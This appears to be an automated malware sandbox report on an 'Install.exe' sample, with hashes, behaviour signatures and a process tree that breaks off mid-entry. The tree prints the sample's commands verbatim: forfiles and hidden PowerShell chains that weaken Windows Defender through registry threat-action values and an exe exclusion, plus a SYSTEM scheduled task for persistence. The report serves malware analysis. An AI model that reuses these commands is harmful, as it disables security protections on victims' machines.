Resubmissions

05/08/2024, 21:18

240805-z5pe5asdqc 8

05/08/2024, 17:39

240805-v8n7baxape 10

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05/08/2024, 17:39

General

  • Target

    Install.exe

  • Size

    6.4MB

  • MD5

    1b1d3711ab31cc870f6c22cadaf6d8fb

  • SHA1

    aa7f3547506a7a7684e495a8c68e13f356065942

  • SHA256

    d92fecfcce66d9c06f7d5b5571ba658417c8f60011273bda3a84c2c2615e3609

  • SHA512

    6ea460d85e365910cfc3511c78c31aff4cdaaf7e2b1f8eb4e31e35fc08770bf426b08626f454dcf8ca9bc220015e501a0ebc69d741c4cf314a8e4446ea63004c

  • SSDEEP

    196608:91OIKkeJ1rTP9XOH3wSvMs9YChln0E6edxa1f:3OIKPTyLGeeENw1f

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 33 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 52 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Install.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3120
    • C:\Users\Admin\AppData\Local\Temp\7zSB1EB.tmp\Install.exe
      .\Install.exe /mTpEedidpcLtW "525403" /S
      2⤵
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\SysWOW64\forfiles.exe
          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
          4⤵
          • Indirect Command Execution
          • Suspicious use of WriteProcessMemory
          PID:3960
          • C:\Windows\SysWOW64\cmd.exe
            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4696
            • \??\c:\windows\SysWOW64\reg.exe
              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
                PID:4160
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            4⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:828
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2480
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                  PID:1920
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              4⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:1856
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4004
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                    PID:2972
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                4⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:4040
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1280
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                      PID:4100
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  4⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:4520
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4464
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • Command and Scripting Interpreter: PowerShell
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1620
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        7⤵
                          PID:4232
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  3⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3560
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2028
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4220
                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2916
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /CREATE /TN "bMXUrtIxrZqSFMYNFL" /SC once /ST 17:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSB1EB.tmp\Install.exe\" Yo /gDdidpvg 525403 /S" /V1 /F
                  3⤵
                  • Drops file in Windows directory
                  • Scheduled Task/Job: Scheduled Task
                  PID:716
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 1084
                  3⤵
                  • Program crash
                  PID:4276
            • C:\Users\Admin\AppData\Local\Temp\7zSB1EB.tmp\Install.exe
              C:\Users\Admin\AppData\Local\Temp\7zSB1EB.tmp\Install.exe Yo /gDdidpvg 525403 /S
              1⤵
              • Executes dropped EXE
              • Drops desktop.ini file(s)
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:1820
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                2⤵
                • System Location Discovery: System Language Discovery
                PID:4160
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                  3⤵
                  • Indirect Command Execution
                  PID:2032
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                    4⤵
                      PID:3964
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:4996
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    PID:2004
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:4880
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2944
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                    3⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:1300
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:3960
                      • \??\c:\windows\SysWOW64\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                        5⤵
                          PID:4040
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:1396
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                        4⤵
                          PID:4660
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                            5⤵
                              PID:3968
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          3⤵
                          • Indirect Command Execution
                          • System Location Discovery: System Language Discovery
                          PID:3668
                          • C:\Windows\SysWOW64\cmd.exe
                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:1284
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                              5⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3348
                              • C:\Windows\SysWOW64\gpupdate.exe
                                "C:\Windows\system32\gpupdate.exe" /force
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:3592
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                        2⤵
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:776
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:5080
                          • C:\Windows\SysWOW64\reg.exe
                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            4⤵
                              PID:4936
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:3020
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:4928
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1388
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2868
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:3664
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:1876
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:2252
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                              3⤵
                                PID:5004
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2188
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4636
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:3068
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:3324
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2028
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                    3⤵
                                      PID:2136
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                      3⤵
                                        PID:4984
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                        3⤵
                                          PID:2916
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:256
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:1416
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:4648
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2516
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                                PID:4260
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                3⤵
                                                  PID:2752
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1868
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:888
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:3164
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:3168
                                                      • C:\Windows\SysWOW64\reg.exe
